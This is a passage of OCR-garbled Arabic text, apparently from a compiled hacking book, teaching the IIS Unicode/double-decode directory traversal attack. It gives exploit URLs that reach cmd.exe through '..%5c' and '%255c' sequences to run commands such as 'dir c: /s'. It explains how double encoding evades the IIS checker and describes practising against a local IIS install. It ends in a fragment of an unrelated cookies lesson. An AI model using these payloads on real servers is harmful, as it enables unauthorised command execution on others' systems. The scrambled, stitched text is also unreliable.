‫ﺗﻌ ﺮ ف ﻣﻌﻨﺎﻫﺎ ‪.‬‬
‫ﻗﻊ‬‫ﺘ ﺤﻜﻢﺑﺎﻟﻤﻮ‬ ‫ﺗﻌﺎﻟﻮ ﻧ ﺮو حﻟﻨﻘﻄﻪ ﺳﻬﻠﻪ وﺑﺴﯿﻄﻪ ﺟﺪاااﻓﻰاﻟﺜﻐ ﺮه ‪،‬اﻧ ﺖﺗﺸﻐ ﻞا ل ‪ cmd.exe‬ﻻﻧﻚﺗ ﺮﯾﺪانﺗ‬
‫وﺗﻐﯿ ﺮاﻻﻧﺪﻛ ﺲ واﻟ ﺦ و وﻟﻜﻦﺗﻌﺎﻟﻰ ﻣﺜﻼ ﻧﺸﻐ ﻞاى ﻣﻠ ﻒﺗﺎﻧﻰ ﯾﺎﺗ ﺮىﻛﯿ ﻒ ﻧﺸﻐﻠﻪ ؟‬
‫ﻗﻠﻚﻛﯿ ﻒ ‪::‬ﻛ ﻞ ﻣﺎ ﻋﻠﯿﻚﻓﻌﻠﻪ ﻫﻮانﺗﻘﻮمﺑﻮ ﺿﻊاﺳﻢاﻟﻔﺎﯾ ﻞاﻟﺬىﺗ ﺮﯾﺪﺗﺸﻐﯿﻠﻪﺑﻬﺬااﻟﺸﻜ ﻞ‬ ‫ﺎﻧﺎ را حا‬
‫‪Ping.exe+PRINT‬ﺑﻼ ﻣﻦ ‪ cmd.exe?/c‬ﻮﺑﻬﺬاﺗﻜﻮنﻗﺪ ﺷﻐﻠ ﺖاﻟﻔﺎﯾ ﻞ ﺎﻟﺬىﺗ ﺮﯾﺪه‬
‫‪ (enjoy this ) .‬ﺣﯿﺚﺗﺼﺒﺢاﻟﺜﻐ ﺮهﺑﻬﺬااﻟﺸﻜ ﻞ ‪::‬‬
‫‪http://issserver/scripts/..%5c..%.../ping.exe+PRINT‬‬

‫ﺘﻰ ﺳﯿﻨﻔﺬ ﻋﻠﯿﻬﺎ‬‫ﺘﺎﻟﻰﻛﻤﺎ ﻋ ﺮﻓﻨﺎﻓﻮ قاﻧﺎ ‪/c‬ﻫﻰا ل ‪argument‬ﻟ ﻞ ‪cmd.exe‬ﺎواﻟ ﺤﺎﻟﻪاﻟ‬ ‫‪* /c+ -‬ﻮﺑﺎﻟ‬
‫ﺘﯿﻦﻓﻰاﻟﺜﻐ ﺮه وﻟﻜﻦ ﻻ‬ ‫ﺘﻰﺑﺠﺎﻧﺐا ل ‪/c‬ﻓﻬﻰﺑﻤﻘﺎماﻟﻤﺴﺎﻓﻪﺑﯿﻦ ﺎﻟﻜﻠﻤ‬ ‫ا ل ‪ cmd‬ﺎﻻﻣ ﺮاﻣﺎ ﻋﻼﻣﻪا ل ‪+‬اﻟ‬
‫ﯾﻤﻜﻨﻨﺎاﺳﺒﺪاﻟﻬﺎﺑﻤﺴﺎﻓﻪ ﻋﺎدﯾﻪ وﺑﻌﺪﻫﺎ ﯾﻜﻮناﻻﻣ ﺮاﻟﺬى ﯾ ﺤﻤﻠﻪ ﺳﻄ ﺮاﻻواﻣ ﺮﻟﯿﻨﻔﺪهﺛﻢ ﻋﻼﻣﻪ ‪+‬ﺛﺎﻧﯿﻪ و‬
‫ﺘﻮﯾﺎﺗﻪ ﻋﻠﻰاﻟﺸﺎﺷﻪ ﺣﺎﻟﯿﺎ ‪.‬‬
‫ﺑﻌﺪﻫﺎاﺳﻢاﻟﺪراﯾ ﻒاﻟﺬىﺗﻌ ﺮ ض ﻣ ﺤ‬

‫**ﻮ ﻧﺄﺗﻰاﻻن ﻻﻫﻢ ﻧﻘﻄﻪﻓﻰاﻟﺜﻐ ﺮه و ﻫﻰاﺳﺎﺳﺎ ﺳﺒﺐ ﺎﻟﺜﻐ ﺮهﻛﻤﺎ ذﻛ ﺮﻧﺎﻓﻰاو لاﻟﻜﻼم )ﻫﻮان ﺳﺒﺐاﻟﺜﻐ ﺮه‬
‫ﯾﻜﻮن ﺣ ﻞ ﺷﻔ ﺮهاﻟﻌﻨﻮاناﻛﺜ ﺮ ﻣﻦ ﻣ ﺮه (وﻫﺬا ﻣﺎ ﻧﻄﻠ ﻖ ﻋﻠﯿﻪا ل ‪decode‬ﻮاﻧﺎ ﺷﺨﺼﯿﺎاﻓﺼ ﻞاﻟﺪﯾﻜﻮدز ﻋﻠﻰ‬
‫ﺘﻰ ﻧﺼ ﻞ ﻻﺑﺴﻂاﻟ ﺤ ﻞﻛﻤﺎﻓﻰاﻟ ﺮﯾﺎ ﺿﯿﺎ ت ﯾﻌﻨﻰ ‪ simplyfiey‬ﺎىﺗﺒﺴﯿﻂ وﻓﻚاﻟﻤﻌﺎدﻟﻪﺗﻌﺎﻟﻮ‬ ‫اﻧﻪﺗ ﺤﻠﯿ ﻞ ﺣ‬
‫ﺧﻠﯿﻨﺎ ﻧﻔﻬﻤﻜﻢ ﻫﺬا ﻋﻠﻰاﻟﺜﻐ ﺮه ﻧﻔﺴﻬﺎ ‪::‬‬

‫ﺘ ﺤﻠﯿ ﻞﻟﻼ ﺻ ﻞ ‪..../‬‬‫‪/..%255c..%255c‬ﻫﺬاﻫﻮاﻟﺪﯾﻜﻮداىاﻟ‬


‫ﺘ ﺤﻠﯿﻼ تاﻟﻐ ﺮﯾﺒﻪ ؟‬
‫ﻮﻟﻜﻦ ﻣﺎاﻟﺬى ﻧ ﺤﺎو لان ﻧﻔﻌﻠﻪﺑﻬﺬهاﻟ‬
‫ﺘﻮرز وﻟﻜﻦﻟﻼﺳ ﻒ ﻻ ﯾﻤﻜﻨﻚﺗﻐﯿﯿ ﺮاواﻟﻠﻌﺐﻓﻰ‬ ‫ﻓﻨ ﺤﻦﺑﺬﻟﻚ ﻧ ﺤﺎو لان ﻧ ﺤﺴﻦ و ﻧﻠﻌﺐﻓﻰ ﻣﺴﺎرا تاﻟﺪﯾ ﺮﯾﻜ‬
‫ﺘﻨﻔﯿﺬ وﻫﻨﺎ ﯾﻘﻊ‬ ‫ﺘﻮرز ﻻنا ل ‪ iis‬ﻣﺰودﺑﺨﺎﺻﯿﻪ ﻋﻤ ﻞ ‪ check‬ﻋﻠﻰ ﻣﺜ ﻞ ﻫﺬهاﻟﺪﯾﻜﻮدز و ﻣﻨﻌﻬﺎ ﻣﻦ ﺎﻟ‬ ‫اﻟﺪﯾ ﺮﯾﻜ‬
‫ﺘﻢﻗﺼﺪىاﻻناىانا ل ‪iis‬ﻣﺰودﻓﻌﻼ‬ ‫ﺘ ﺤﻠﯿ ﻞﻟﻤﺮﺗﯿﻦاو ﻻﻛﺜ ﺮ ﻣﻦ ﻣ ﺮهﻓﻬﻤ‬ ‫ا ﺻ ﻞﺛﻐ ﺮهاﻟﯿﻮﻧﻰﻛﻮد و ﻫﻮاﻟ‬
‫ﺑﺨﺎ ﺻﯿﻪا ل ‪ check‬ﻋﻠﻰ ﻫﺬهاﻟﺪﯾﻜﻮدز وﻟﻜﻦاﻧ ﺖﺗ ﻀﻊ ﺎﻟﺜﻐ ﺮه وﺑﻬﺎاﻛﺜ ﺮ ﻣﻦﺗ ﺤﻠﯿ ﻞ وا ﺣﺪﻟﻨﻔ ﺲاﺳﻢ‬
‫ﺘﺎده و ﻫﻰا ل ‪ check‬ﻮاﻟﻤﻨﻊ ﻋﻠﻰاﻟﺪﯾﻜﻮداﻻو ل و ﯾﻈﻬ ﺮﻟﻪان‬ ‫ﺘﻪ ﺎﻟﻤﻌ‬
‫ﻗﻊ وﻟﺬﻟﻚ ﯾﻘﻮما ل ‪iis‬ﺑﻮﻇﯿﻔ‬ ‫اﻟﻤﻮ‬
‫ﻗ ﻒ ﺧﺨﺨﺨﺨﺨﺨ ﺦ وﻟﻜﻦاﻟ ﺤﻘﯿﻘﻪاﻧﻪ ﯾﻌﻤ ﻞا ل ‪check‬ﻣ ﺮه وا ﺣﺪه‬ ‫ﻛ ﻞ ﺷﺊﺑﺨﯿ ﺮ واﻧﻪ ﯾﺴﯿﻄ ﺮ ﻋﻠﻰاﻟﻤﻮ‬
‫ﺘﯿﺠﻪ ﺎﻟﺪﯾﻜﻮد‬ ‫ﺘﺎﻟﻰ ﯾﻜﻮن ﻧ‬ ‫ﺘﻮرز وﺑﺎﻟ‬‫ﺘﯿﺠﻪاناﻟﺪﯾﻜﻮداﻟﺜﺎﻧﻰ ﯾﻨﺠﺢﺗﻤﺎﻣﺎﻓﻰ ﻣ ﺤﺎوﻟﻪاﻟﻠﻌﺐﻓﻰاﻟﺪﯾ ﺮﯾﻜ‬ ‫ﺘﻜﻮناﻟﻨ‬ ‫ﻓ‬
‫اﻟﺜﺎﻧﻰ ﻫﻮان ﯾ ﺮﺟﻊاﻟﻰا ﺻﻠﻪاى) ‪/ (slash‬‬

‫ﺘﻌﻤ ﻖ ﺎﻛﺜ ﺮﻓﻰﺗﻔﺎ ﺻﯿ ﻞاﻟﺪﯾﻜﻮدﻟﻠﺜﻐ ﺮهﺑﻌﺪان ﻋ ﺮﻓﻨﺎﻓﻜﺮﺗﻬﺎ ‪::‬‬


‫ﻮﺗﻌﺎﻟﻮ ﻧﺪ ﺧ ﻞ و ﻧ‬
‫ﺷﻮﻓﻮﻓﯿﻪ ﻣﺎدهاﺳﻤﻬﺎ ‪ computer logic‬ﻮاﻟﻤﺎده دى را ح درسﻓﯿﻬﺎ ﺷﺊ ﯾﺴﻤﻰ ‪HexaDecimal‬‬
‫‪Values‬ﻮﻫﺬها ل ‪values‬ﻫﻰاﺳﺎساﻟﺪﯾﻜﻮداﻟﺬى ﻧﻔﻌﻠﻪﻓﻰاﻟﺜﻐ ﺮهاىانﻛ ﻞ ﺣ ﺮ ف ﺻ ﺤﯿﺢاو ﺣ ﺮﻛﻪ‬
‫ﻣﺜ ﻞ ‪/‬ﻓﻰ ﺎﻟﻜﻤﺒﯿﻮﺗ ﺮﻟﻬﺎ ﻣﺎ ﯾﺴﻤﻰﺑﺎ ل ‪hex value‬ﺗﻌﺎﻟﻰاو ﺿ ﺤﻠﻚاﻛﺜ ﺮ ‪::‬‬

‫‪١١٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻣﺜﻼ‪٢٠% :‬ﺗﻌﻨﻰ ﻣﺴﺎﻓﻪ)‪(space‬‬


‫ﺘﻘﺪاﻧﻚﻓﻬﻤ ﺖاﻻنﻛﻼﻣﻰ و ﻃﺒﻌﺎ ﯾﻮﺟﺪ ﺟﺪو لﻟﻬﺬها ل ‪ hex values‬ﺎﻟﻤﺴﺎوﯾﻪ‬ ‫ﻫﺬا ﻣﺜﺎ لﺑﺴﯿﻂ واﻋ‬
‫ﺘﻘﺪاﻧﻚادرﻛ ﺖﺗﻤﺎﻣﺎاﻻناﻧﻚﺗ ﺮﺳ ﻞ ‪hex values‬‬ ‫ﻟﻠ ﺤ ﺮو ف واﻟ ﺤ ﺮﻛﺎ تاﻟﻌﺎدﯾﻪﻓﻰاﻟﻜﻤﺒﯿﻮﺗ ﺮ ‪،‬اذناﻋ‬
‫ﺘ ﺤﻠﯿ ﻞاوﻓﻚاﻟﺸﻔ ﺮهاوا ل‬
‫ﻋﻮ ﺿﺎ ﻋﻦاﻟ ﺤ ﺮو ف واﻟ ﺤ ﺮﻛﺎ تاﻟﻌﺎدﯾﻪاﻟﻰاﻟﺴ ﺮﻓ ﺮ و ﻫﺬاﺑﺎﻟ ﻀﺒﻂ ﻣﺎ ﻧﺴﻤﯿﻪاﻟ‬
‫‪decode‬‬

‫ﺘﻰ ﻧﺸ ﺮ ح ﻋﻠﯿﻬﺎ ﻫﻰا ل ) ‪ / (slash‬ﺣﯿﺚاﻧﻬﺎ ﻣﻦ‬ ‫ﺗﻌﺎﻟﻰ ﻧﺨ ﺶﻓﻰﺗﻔﺎ ﺻﯿ ﻞ ﺎﻟﺜﻐ ﺮهاﻛﺜ ﺮ و ﺳﻨﺄ ﺧﺬاﻟ ﺤ ﺮﻛﻪاﻟ‬
‫اﺳﺎﺳﯿﺎ ت ﺎﻟﺪﯾﻜﻮدﻓﻰ ﻫﺬهاﻟﺜﻐ ﺮه ‪::‬‬
‫ﺘﻔﻜ ﺮاﻻن‬
‫ﺷﻮ فﻓﻰ ﺟﺪو لا ل ‪ hex value‬ﺮا ح ﻧﺠﺪانا ل ‪ c , ٥% = /‬ﻃﺒﻌﺎﻫﺬاﻫﻮاﻟﺪﯾﻜﻮداﻻو لاﻟﺬى ﺳ‬
‫ﻗﻮ لﻟﻚ ﻫﺬا ﺧﻄﺄ ﻻن ﻫﺬاﻫﻮ‬ ‫ﺘﻨﺠﺢاﻟﺜﻐ ﺮه وﻟﻜﻦاﻧﺎا‬ ‫ﻓﻰاﻧﻚﺗ ﺤﺬ فا ل ‪ /‬وﺗ ﻀﻊﺑﺪﻻ ﻣﻨﻬﺎ ﻫﺬا ﺎ ل ‪value‬ﻓ‬
‫ﺘﺠﺪ‬‫اﻟﺪﯾﻘﻮداﻻو ل واﻧﺎ ذﻛ ﺮ تاناﻟﺪﯾﻜﻮد ﯾ ﺤﺪ ث ﻣﺮﺗﯿﻦاو ﻣﻤﻜﻦاﻛﺜ ﺮ ﯾﻌﻨﻰﻟﻮ و ﺿﻌ ﺖﻫﺬااﻟﺪﯾﻜﻮداﻻو لﻓﺴ‬
‫ﺘﻨﻔﯿﺬ وﻟﺬﻟﻚ ﻋﻠﯿﻨﺎان ﻧ ﺤﻠ ﻞﻫﺬاا ل ‪value‬‬
‫ان ﺎ ل ‪iis‬ﻟﺪﯾﻪاﻟﻘﺪره ﻋﻠﻰان ﯾﻤﺴﻚﻫﺬااﻟﺪﯾﻜﻮد و ﯾﻤﻜﻨﻌﻪ ﻣﻦاﻟ‬
‫ﺘﻨﺠﺢاﻟﺜﻐ ﺮه‬ ‫ﺘﺎﻧﻰﻓ‬ ‫ﺘﻢاﻟﺪﯾﻜﻮداﻟ‬
‫ﺘﻰ ﯾ‬
‫ﺣ‬

‫ﻮﺑﺎﻟﻨﻈ ﺮاﻟﻰ ﺟﺪو ل ﺎ ل ‪ hexadecimal values‬ﺷﻮ ف ﻧﺠﺪ ﻫﺬا ‪::‬‬


‫‪% = %25‬‬
‫‪5 = %35‬‬
‫‪c = %63‬‬

‫ﺘﺎﻟﻰﻓﺴﻨ ﺤﺼ ﻞﻓﻰ‬
‫ﺘﺎﻟﻰ ﻧﺠﺪاﻧﻔﺴﻨﺎﻗﺪ ﺧﺪﻋﻨﺎا ل ‪iis checker‬ﺑﺄﻧﻨﺎ ﺣﻠﻠﻨﺎا ل ﺷﻔ ﺮه ﻣﺮﺗﯿﻦ وﺑﺎﻟ‬ ‫ﻮﺑﺎﻟ‬
‫ﺘﺎﻟﻰﺗﻜﻮنﻗﺪ ﻧﺠ ﺤ ﺖاﻟﺜﻐ ﺮه ‪.‬‬
‫اﻟﻤﻘﺎﺑ ﻞ ﻋﻠﻰاﻻﺻ ﻞ و ﻫﻮ ‪ /‬وﺑﺎﻟ‬

‫ﺘﻢاﺳﺎساﻟﺜﻐ ﺮه واﻟﺪﯾﻜﻮد ﻣﺮﺗﯿﻦﻟﯿ ﺲ ﻣﻌﻨﺎهﺗﻜ ﺮار‬


‫ﺘﻢاﻻن ﺷﺒﺎب ﻣﻌﻨﻰ دﯾﻜﻮداﻟﻌﻨﻮان ﻣﺮﺗﯿﻦ وﻓﻬﻤ‬ ‫ﻓﻬﻤ‬
‫ﺘ ﺤﻠﯿ ﻞاﻻو لاى ‪ simplify‬ﺎﻟﻰ ﺎﺑﺴﻂ وا ﻃﻮ ل ﺻﻮره ﻣﻤﻜﻨﻪ‬
‫ﺘ ﺤﻠﯿ ﻞاﻻو ل ﻣﺮﺗﯿﻦ وﻟﻜﻦ ﻣﻌﻨﺎهﺗ ﺤﻠﯿ ﻞ وﻓﻚاﻟ‬
‫اﻟ‬
‫ﻗﺖ‬ ‫ﻓﻰ ﻧﻔ ﺲاﻟﻮ‬

‫ﺘ ﺤﻠﯿ ﻞ ‪::‬‬
‫ﺘ ﺮﻛﯿﺒﻪاﻟﺼﺢﻟﻠ‬
‫ﻮ ﻋﺸﺎنﺗﻮ ﺿﺢاﻛﺜ ﺮ ﻣﻌﻚ را حا ﺣﻄﻠﻚﻛﯿ ﻒ ﺎﻟ‬
‫‪%255c %25 = % 5 = 5 c = c = %5c‬‬
‫‪%%35c % = % %35 = 5 c = c = %5c‬‬
‫‪%%35%63 % = % %35 = 5 %63 = c = %5c‬‬
‫‪%25%35%63 %25 = % %35 = 5 %63 = c = %5c‬‬

‫ﺛﻢ ‪c =/٥% :‬‬

‫ﺘ ﺤﻠﯿﻼ ت‬
‫ﺘ ﺤﻠﯿ ﻞ ﻃﺒﻌﺎﻓﻰاﻻ ﺧ ﺮ ﯾﺠﺐان ﯾﺴﺎوىاﻟﺪﯾﻜﻮداﻻ ﺻ ﻞ و ﻫﻮﻛﻤﺎﻫﺔ وا ﺿﺢﻓﻰ ﻣﺜﺎﻟﻨﺎﻛ ﻞاﻟ‬ ‫ﺘﻢاﻟ‬‫ﺎراﺋﯿ‬
‫ﺘﻰ ﻧﺨﺪ عا ل ‪iis‬‬‫ﺗﺴﺎوى ‪ c ٥%‬وﻛﻤﺎ ذﻛ ﺮﻧﺎ ‪ %5c = /‬ﻮﻟﻜﻨﻨﺎ ﺣﻠﻠﻨﺎﻫﺬااﻟ ﺮﻣﺰاﻟﻰا ﻃﻮ ل واﺑﺴﻂﺗ ﺤﻠﯿ ﻞ ﺣ‬
‫‪checker .‬‬
‫ﻮﻓﻰاﻟﻨﻬﺎﯾﻪﺑﻌﺪﻓﻬﻤﻨﺎﻟﻠﺜﻐ ﺮه واﺳﺎﺳﻬﺎﻫﯿﺎﺗﻌﺎﻟﻮ ﻧﻄﺒﻘﻬﺎ ﻣﻊﺑﻌ ﺾ‬
‫ﺳﻮ ف ﻧ ﻀﻊاﻟﺜﻐ ﺮهﻓﻰ ﻫﺬااﻟﺸﻜ ﻞ ‪::‬‬
‫‪http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s‬‬

‫ﻗﻊﺑﻨﺠﺎ ح وﻟﻜﻦاﻛﯿﺪﺗﻼ ﺣﻈﻮن ﺷﺊ ﺟﺪﯾﺪﻗﺪ زاد ﻋﻠﻰاﻟﺜﻐ ﺮه و ﻫﺬااﻟﺸﻰ ﻫﻮ‪+/s‬‬


‫ﺘﺪ ﺧﻠﻮن ﻋﻠﻰاﻟﻤﻮ‬
‫ﻮﺳ‬

‫‪١١٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻫﺬااﻟ ﺮﻣﺰ‬
‫ﺘﻪﺑﻜ ﻞﻓﺎﯾ ﻞﻛﺒﯿ ﺮ و ﺻﻐﯿ ﺮﻓﻰ‬
‫ﻮ ﻋﻨﺪﻣﺎﺗﺪﻣ ﺞ ﻫﺬااﻟ ﺮﻣﺰ ﻣﻊاﻟﺜﻐ ﺮهﻛﻤﺎﻓﻰاﻟﻤﺜﺎ لاﻟﺴﺎﺑ ﻖ ﺳﻮ فﺗﺄﺗﯿﻚﻟﺴ‬
‫ﻛﻤﺒﯿﻮﺗ ﺮاﻟﻮﯾﺐ ﺳ ﺮﻓ ﺮ‬

‫ﺘﻰا ﺻ ﻞﻟﻬﺬااﻟﺸﻜ ﻞ‬ ‫ﻮا ﷲﺗﻌﺒ ﺖﻓﻰ ﻫﺬااﻟﺪرس وﺗﻌﺒ ﺖﻓﻰﻗ ﺮاﺋﻪاﻟﻤﻌﻠﻮﻣﺎ ت وﺗﺠﻤﯿﻌﻬﺎ ﻋﻦاﻟﯿﻮﻧﻰﻛﻮد ﺣ‬
‫ﺘ ﺤﺎﻧﻰاﻻو لﻓﻰ( ‪ MCSE‬ﺎدﻋﻮﻟﻰ‬ ‫ﺘﻈ ﺮو ﻣﻮ ﺿﻮﻋﻰاﻟﻘﺎدمﺑﻌﺪﻣﺎاﻛﻮناﻧﻬﯿ ﺖاﻣ‬ ‫ﺎﻻ ﺧﻮه وان ﺷﺎ ءا ﷲاﻧ‬
‫ﻗﻬﺎ وﻓﺎﺋﺪها ل‬
‫ﺘ ﺮا‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊ ﺷﺒﻜﺎ ت وﯾﻨﺪوز ‪ ٢٠٠٠‬وﻛﯿﻔﯿﻪ ﺎ ﺧ‬
‫ﺑﺎﻟﻨﺠﺎ ح ( و ﺳﯿﻜﻮن ﻋﺒﺎره ﻋﻦﺗﻠﺨﯿ ﺺﻟﻠ‬
‫‪....WIN2000 RESOURCE KIT‬‬

‫‪١١٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺗﺪرﯾﺐ ﻋﻠﻰ ﻋﻤﻠﯿﺔ اﻹﺧﱰاق ﺑﻮاﺳﻄﺔ اﻟﯿﻮﻧﯿﻜﻮد "‬

‫‪$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000 :‬‬
‫‪$$$$$$$$$$$$$$$$$‬‬

‫ﺑﺴﻢا ﷲاﻟ ﺮ ﺣﻤﻦاﻟ ﺮ ﺣﯿﻢ‪..‬‬


‫ﺘ ﺮا ق ﻋﻦ ﻃ ﺮﯾ ﻖ ﺎﻟﯿﻮﻧﯿﻜﻮدأوﺑﺎﻷﺻﺢ‬
‫ﻗﻊﺑﺄﻧﻮاﻋﻪ واﻟﯿﻮم ﻋﻨﺪي ﺷ ﺮ ح ﻋﻦاﻹ ﺧ‬ ‫ﺘ ﺮا قاﻟﻤﻮا‬‫ﻛﺜ ﺮاﻟﻜﻼم ﻋﻦإ ﺧ‬
‫ﺘﺪﺋﯿﻦ وﻫﻮاﻟﺬيﺑﺈذنا ﷲ‬ ‫ﺘﺒ ﺮﻟﻠﻤﺒ‬
‫ﺘ ﺮا ق ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﯿﻮﻧﯿﻜﻮد وﻫﺬااﻟﻨﻮ ع ﯾﻌ‬‫ﺗﻄﺒﯿ ﻖ ﻋﻤﻠﻲ ﻋﻠﻰﻛﯿﻔﯿﺔاﻹ ﺧ‬
‫ﺘ ﺮا ف‪.....‬‬
‫ﺳﯿﻮ ﺻﻠﻬﻢإﻟﻰ ﻃ ﺮﯾ ﻖاﻹ ﺣ‬
‫***************************************************************************************‬
‫ﺑﺴﻢا ﷲ ﻧﺒﺪأ‪...‬‬
‫ﻗﻊ‬‫ﺘﻄﺒﯿ ﻖاﻟﺪرسﻛﻤﺎ وأﻧﻚ ﻋﻠﻰ ﻣﻮ‬ ‫ﻗﻊأواﻟﺴﯿ ﺮﻓ ﺮ وﺗﻘﻮمﺑ‬ ‫ﺘﻄﺒﯿ ﻖ ﻋﻠﻰ ﺟﻬﺎزك وﻫﻮ ﻣﺜ ﻞاﻟﻤﻮ‬ ‫ﺳﯿﻜﻮناﻟ‬
‫ﻣﺼﺎب‪.....‬‬

‫ﺘ ﺮﻛﯿﺐ ﻧﻈﺎم وﯾﻨﺪوز‪ ٢٠٠٠‬ﻋﻠﻰ ﺟﻬﺎزك ‪ .‬وﻓﻲ ﻧﻔ ﺲاﻟﺴﯿﺪيﺗﺒﻊاﻟﻨﻈﺎم‬ ‫ﻗﻊﻗﻢﺑ‬ ‫ﺘ ﺮا قاﻟﻤﻮا‬ ‫ﺘﺪرب ﻋﻠﻰإ ﺧ‬ ‫ﻟﻜﻲﺗ‬
‫ﺗﻘﻮمﺑﺈ ﺿﺎﻓﺔ ﺳﯿ ﺮﻓ ﺮ ‪ IIS‬ﻮذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ ‪:‬‬
‫ﺘ ﺤﻜﻢ‪.‬‬ ‫ﻗﻢﺑﺎﻟﺬﻫﺎبإﻟﻰﻟﻮ ﺣﺔ ﺎﻟ‬ ‫‪*١‬‬
‫ﻗﻢﺑﺎﻟﻨﻘ ﺮ ﻋﻠﻰإ ﺿﺎﻓﺔإزاﻟﺔﺑ ﺮاﻣ ﺞ‪.‬‬ ‫‪*٢‬‬
‫ﻗﻢﺑﺎﻟﻨﻘ ﺮ ﻋﻠﻰ زر "إ ﺿﺎﻓﺔﺈزاﻟﺔ ﻣﻜﻮﻧﺎ ت وﯾﻨﺪوز "‪.‬‬ ‫‪*٣‬‬
‫ﻗﻢﺑﻮ ﺿﻊ ﻋﻼﻣﺔ ﺻﺢ ﻋﻠﻰاﻟﺨﯿﺎراﻷو ل‪“ IIS” .‬‬ ‫‪*٤‬‬
‫ﻫﺬاﺑﺎﻟﻨﺴﺒﺔﻟﻜﯿﻔﯿﺔﺗﻨﺰﯾ ﻞاﻟﺴﯿ ﺮﻓ ﺮ‪..‬‬
‫ـ‬
‫ﺘﺎﻟﻲ‪:‬‬‫ﻗﻪﻓﻘﻢﺑﺎﻟ‬ ‫ﺘ ﺮا‬‫ﺘﺪرب ﻋﻠﻰاﻟﺠﻬﺎزأيا ﺧ‬ ‫ﺎﻣﺎ ﻋﻦﻛﯿﻔﯿﺔاﻟ‬
‫ﺘﺪ ﺧ ﻞ ﻋﻠﯿﻪﺑﻌﺪ ﻣﺎﺗﺸﻐ ﻞ‬‫ﻗﻊﻓﻲ ﻣﺠﻠﺪ ‪ wwwroot‬ﺎﻟﻤﻮﺟﻮد دا ﺧ ﻞ ﻣﺠﻠﺪ ‪ Inetpub‬ﻃﺒﻌﺎ ﻫ‬ ‫ﻗﻢﺑﻮ ﺿﻊاﻟﻤﻮ‬
‫اﻟﺴﯿ ﺮﻓ ﺮ ‪ IIS‬ﻋﻦ ﻃ ﺮﯾ ﻖ‬
‫‪http://127.0.0.1/‬‬
‫ﺘﺸﻐﯿ ﻞﺑ ﺮﻧﺎﻣ ﺞ ﻋﻤ ﺮان ﺳﻜﺎنأوأيﺑ ﺮﻧﺎﻣ ﺞا ﺧ ﺮﻟﻠﻔ ﺤ ﺺ ﻋﻦ‬ ‫ﺘﺪرب ﻋﻠﯿﻬﺎﻗﻢﺑ‬ ‫ﻮﻹﯾﺠﺎداﻟﺜﻐ ﺮةﻓﻲاﻟﺠﻬﺎز واﻟ‬
‫ﻗﻢﺑﻮ ﺿﻊاﻟﻌﻨﻮانﺗﺒﻌﻚاﻟﻲﻫﻮ ‪http://127.0.0.1/‬‬ ‫اﻟﺜﻐ ﺮا تﺗﺒﻊاﻟﯿﻮﻧﯿﻜﻮد و‬
‫ﻗﻊاﻟﻤﺼﺎﺑﺔﺑﺎﻟﯿﻮﻧﯿﻜﻮد‪...‬‬ ‫ﺘ ﺮا قاﻟﻤﻮا‬ ‫ﺘﻬﺎﻓﻲ ﺎ ﺧ‬ ‫ﺘﻲﺗﻌﻠﻤ‬ ‫ﺘﻄﺒﯿ ﻖاﻟﻤﻬﺎرا تاﻟ‬‫ﻗﻢﺑ‬ ‫ﻮ‬

‫‪١ ٢٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" درس ﻣﻔﺼﻞ ﻋﻦ اﻟﻜﻮﻛﯿﺰ "‬

‫‪$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪Linux Girl:‬‬
‫‪$$$$$$$$$$$$$‬‬

‫ـ‬
‫ـ‬‫ـ‬‫ﻣﻘﺪﻣﺔ‪:‬‬
‫^^^^^^‬
‫ﺘﻤﻜﻦ ﻣﻦ‬
‫ﺘ‬‫ﺘﻬﺎ ﺳ‬
‫ﻗﻊاﻛﺜ ﺮﺗﻔﺎﻋﻠﯿﺔ ‪،‬ﻓﺒﻮاﺳﻄ‬
‫ـ ) ‪ cookies‬ﻣﻦاﻟﻮﺳﺎﺋ ﻞاﻟﻤﻔﯿﺪةﻓﻲاﻧﺸﺎ ء ﻣﻮا‬
‫ﺗﻌﺪاﻟﻜﻌﻜﺎ ت )اﻟ‬
‫ﻗﻌﻚ ﻣﻦﻗﺒ ﻞام ﻻ‪..‬‬‫ﺘﺼﻔﺢﺑﺰﯾﺎرة ﻣﻮ‬
‫ﻣﻌ ﺮﻓﺔ ﻫ ﻞﻗﺎماﻟﻤ‬

‫ﺘﺨﺪاﻣﻬﺎ‪...‬‬
‫ﺘﻌ ﺮ ف ﻋﻠﻰاﻟﻜﻌﻜﺎ ت وﻛﯿ ﻒ ﯾﻤﻜﻨﻨﺎاﺳ‬
‫ﻓﻲ ﻫﺬااﻟﺪرس ﺳﻨ‬

‫ﻗﺴﺎماﻟﺪرس ‪:‬‬ ‫ﺎ‬


‫‪ -١‬ﻣﻌﻠﻮﻣﺎ ت ﻋﺎﻣﺔ ‪.‬‬
‫‪-٢‬ﺰراﻋﺔاﻟﻜﻌﻜﺎ ت ﻋﻠﻰ ﺟﻬﺎز ﺎﻟﻌﻤﯿ ﻞ ‪.‬‬
‫‪-٣‬ﻗ ﺮا ءةاﻟﻜﻌﻜﺎ ت ﻣﻦ ﺟﻬﺎزاﻟﻌﻤﯿ ﻞ ‪.‬‬
‫‪-٤‬ﺗﻄﺒﯿ ﻖ ‪:‬ﺗﺨﺼﯿ ﺺﻟﻮناﻟﺨﻠﻔﯿﺔ‪.‬‬
‫><><><><><><><><><><><><><><><><><><><><><><><><><><><><><‬

‫ﻣﻌﻠﻮﻣﺎ ت ﻋﺎﻣﺔ‬
‫^^^^^^^^‬

‫‪ -‬ﻣﺎﻫﻲ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰ ؟‬


‫^^^^^^^^^^^^^^‬
